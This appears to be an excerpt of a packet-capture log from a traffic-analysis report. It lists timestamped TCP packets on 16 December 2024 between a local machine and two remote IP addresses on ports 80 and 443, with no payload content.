                                                                                                                                                                                              Dec 16, 2024 01:01:45.438002110 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.438093901 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.439161062 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.439225912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.439275026 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.439383030 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.439435959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.440362930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.440532923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.440588951 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.441656113 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.441705942 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.441793919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.442806005 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.442854881 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.442928076 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.443147898 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.444111109 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.444147110 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.444161892 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.444283009 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.445060968 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.445106983 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.445240974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.445286036 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.446398020 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.446414948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.446451902 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.446451902 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.447683096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.447751999 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.447793007 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.447933912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.447952032 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.447995901 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.448812962 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.448858023 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.449064016 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.451159954 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.452230930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.452282906 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.452405930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.452447891 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.452799082 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.452815056 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.452848911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.452848911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.453432083 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.453474045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.453552008 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.453597069 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.454653025 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.454699039 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.454808950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.454853058 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.455718994 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.455878019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.455924034 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.457149982 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.457206011 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.457303047 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.458276033 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.458323002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.458422899 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.459367037 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.459420919 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.459589958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.459634066 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.460720062 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.460736036 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.460787058 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.460788012 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.461819887 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.463151932 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.502505064 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.502562046 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.502702951 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.502726078 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.502726078 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.502806902 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.502855062 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.553487062 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.569654942 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.569664955 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.569833040 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.569869995 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.569895983 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.569950104 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.569983959 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.570015907 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.570017099 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.570017099 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.570055008 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.586913109 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.586941004 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.586993933 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.587389946 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.587444067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.587549925 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.587688923 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.588573933 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.588635921 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.588824987 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.588871956 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.589895010 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.590173006 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.610200882 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.610265017 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.610299110 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.610338926 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.610588074 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.610666037 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.610769033 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.610842943 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.611854076 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.611898899 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.611987114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.612092972 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.613096952 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.613171101 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.613595963 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.613641977 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.613696098 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.613842964 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.614686012 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.614703894 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.614756107 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.615621090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.615670919 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.615809917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.615869999 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.616828918 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.616844893 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.616878033 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.616910934 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.617947102 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.617994070 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.618055105 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.618092060 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.619210958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.619226933 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.619257927 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.619291067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.620336056 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.620388031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.620438099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.620438099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.621486902 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.621536970 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.621615887 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.621702909 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.622704029 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.622750998 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.622889042 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.622936964 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.623810053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.623868942 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.623980999 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.624026060 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.625263929 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.625355005 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.625403881 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.626308918 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.626359940 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.626408100 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.626512051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.627361059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.627408981 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.627620935 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.627648115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.627665043 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.627670050 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.627691984 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.627717018 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.629064083 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.629111052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.629867077 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.629983902 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.631709099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.631761074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.631817102 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.631905079 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.632477045 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.632494926 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.632525921 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.632559061 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.633455992 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.633532047 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.633641958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.633692980 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.634690046 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.634737968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.634815931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.634897947 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.635955095 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.635972023 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.636003017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.636034966 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.636892080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.636935949 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.637023926 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.637085915 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.638106108 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.638154984 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.638217926 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.638259888 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.639369011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.639385939 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.639421940 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.639421940 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.640647888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.640665054 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.640693903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.640726089 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.641803026 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.641874075 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.641896009 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.641928911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.642959118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.642976046 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.643003941 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.643035889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.644114017 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.644164085 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.644243002 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.644329071 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.645176888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.645220041 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.645349026 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.645394087 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.646505117 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.646552086 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.646574974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.646720886 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.647742987 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.647759914 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.647805929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.648847103 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.648890972 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.649019003 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.649079084 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.650110006 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.650160074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.650216103 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.650319099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.651194096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.651243925 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.651299000 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.651384115 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.652272940 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.652323008 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.652612925 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.652887106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.653636932 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.653685093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.653839111 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.653944969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.654771090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.654818058 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.654907942 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.654949903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.656054974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.656073093 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.656104088 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.656104088 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.657263994 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.657282114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.657325029 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.658366919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.658416033 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.658565044 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.659574986 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.659578085 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.659595013 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.659640074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.660684109 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.660736084 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.660825968 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.660855055 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.660871029 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.660904884 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.660937071 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.661696911 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.661744118 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.661828995 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.661871910 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.663007975 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.663033009 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.663060904 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.663094044 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.664202929 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.664220095 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.664253950 CET4984880192.168.2.431.41.244.11
